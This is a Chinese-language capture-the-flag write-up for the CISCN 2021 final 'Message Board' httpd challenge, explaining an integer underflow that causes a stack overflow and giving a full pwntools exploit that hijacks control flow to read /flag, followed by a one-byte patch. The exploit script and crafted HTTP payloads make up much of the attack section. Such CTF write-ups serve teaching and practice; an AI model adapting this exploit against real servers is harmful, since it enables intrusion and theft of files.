ciscn 2021 Final Day2 Message Board 思路分享

阅读量242124

|评论1

|

发布时间 : 2021-08-05 17:30:33

 

0x00 前言

今年华为之夜没有中奖,看来抽奖致富不可取,还是要树立勤劳致富的正确态度。所以就让我来分享一下今天刚打的httpd

附件(附件不包含html网页,不能用浏览器访问这个题)

 

0x01 程序分析

首先看main函数,似乎整个main都没干啥实际有用的东西,最后跟进sub_804906C(s); 这里是程序逻辑的核心。首先理清程序大致的一个逻辑。这其中有一个if语句是区分POST和GET的,GET分支的语句基本上就是读取文件然后输出的逻辑。POST语句中submit似乎有点复杂,我们细看这里的变量传递

image-20210718203241310

如果Message里面没有以“|”结尾的情况,那就要—n。可是问题来了,假如这里的n是0,到时候—n,则n=0xffffffff,到下面的fread就会造成一个栈溢出。

 

0x02 漏洞利用

EOF

那看起来似乎是很简单的一个栈溢出?那么你现在首先到达第一个坑点:无法停止读取stdin。细想一下fread函数从文件流里读取字符,参数又指定了大小,那么只有EOF才能让他停止。所以我们这里理论上只能发送一次ROP链,而且需要让pwntool发送EOF。查询资料得知:

p = remote(xxxx,xx)
p.shutdown_raw('send')

可以断开EOF了,我们根据之前访问时的预留的Message对返回地址长度进行动态测量。在我这里大致的HTTP请求偏移0x82d

p1 = cyclic(0x82d) + p32(0)
payload = '''POST /submit HTTP/1.1
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: Username=88888; Messages=Gyan

{}'''.format(p1)

Gadget

细看函数表发现这里没法用常规的思路,一方面只能溢出一次就要点开连接似乎没法泄露libc地址,另一方面这里每一个读写函数都要用到文件流

image-20210718210818511

那我就退一步吧!不拿shell,读个文件就行了吧!这里我们可以想到一个地方

image-20210718211234735

这个函数是封装的读取文件函数。我们劫持到这里可能就可以成功

image-20210718211618826

image-20210718211639829

这里的EBP被栈溢出覆盖了,所以我们需要找到一个可控的地址来写文件名就可以成功!

bss段上的dest

翻看全局变量,我们发现了一个dest变量,逆向分析得知他似乎是来装一个HTTP头的,我们断在我们的gadget处看一下dest现在长啥样

image-20210718212204392

哈哈,因为一般电脑上User-Agent 很长,我这里是

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

结果只剩下了

x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

那我把这剩下这段改成/flag就不是可以任意文件读啦?
这里的地址是0x804c1b1 加上EBP偏移就是0x804C5DD

所以最终的payload就是:

p1 = cyclic(0x829) +p32(0x804C5DD) + p32(0x8049305)
payload = '''POST /submit HTTP/1.1
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; /flag
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: Username=88888; Messages=Gyan

{}'''.format(p1)
payload = payload.replace("\n","\r\n")

exp:

from pwn import *
context.log_level = "debug"
p = process(['./httpd'])
# p = remote("10.1.136.10",10000)
elf = ELF("./httpd")
p1 = cyclic(0x829) +p32(0x804C5DD) + p32(0x8049305)
payload = '''POST /submit HTTP/1.1
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; /flag
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: Username=88888; Messages=Gyan

{}'''.format(p1)
payload = payload.replace("\n","\r\n")
p.send(payload)
p.shutdown_raw('send')
p.interactive()

 

0x03总结:

这个题非常有意思,一方面比较贴近实战,另一方面让我这个只会栈溢出的菜鸡给我们菜队贡献了一份力量,稳住了排名

 

0x04 patch:

patch 我觉得是作者故意留给你一段代码可以让你可以只patch一个字节

image-20210718214419986

这里的if是判断v14是否是负数,可是v14本身是无符号数,再加上前面的判断就可以完成本身的功能了,所以这里我们把汇编代码对应的jns改成jnz即可

 

0x05 参考资料:

https://blog.csdn.net/weixin_43921239/article/details/117341777

本文由Gyan原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/247645

安全客 - 有思想的安全新媒体

分享到:微信
+15赞
收藏
Gyan
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66